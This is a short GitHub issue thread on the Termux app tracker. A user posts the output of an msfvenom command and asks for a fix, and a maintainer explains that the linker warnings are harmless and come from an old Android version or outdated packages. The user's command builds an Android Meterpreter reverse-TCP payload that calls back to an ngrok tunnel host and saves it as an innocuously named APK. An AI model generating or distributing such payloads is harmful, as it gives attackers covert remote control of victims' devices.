### ISSUE TITLE
Please tell me solution

### ISSUE THREAD

**Issue by p123s** [termux/termux-app#1644]
msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=13098 R > storage/download/abcdefghij.apk
WARNING: linker: /data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/nokogiri-1.8.0/lib/nokogiri/nokogiri.so: unused DT entry: type 0x6ffffef5 arg 0xba0
WARNING: linker: /data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/json-2.2.0/lib/json/ext/parser.so: unused DT entry: type 0x6ffffef5 arg 0x338
WARNING: linker: /data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/json-2.2.0/lib/json/ext/generator.so: unused DT entry: type 0x6ffffef5 arg 0x3c8
WARNING: linker: /data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/msgpack-1.3.0/lib/msgpack/msgpack.so: unused DT entry: type 0x6ffffef5 arg 0x698

**Comment by Grimler91** [comment]
Your device is either running android 5 or 6, or you have very outdated packages. We do not support android 5/6 anymore and what you are seeing is in any case warnings, it doesn't affect the programs.
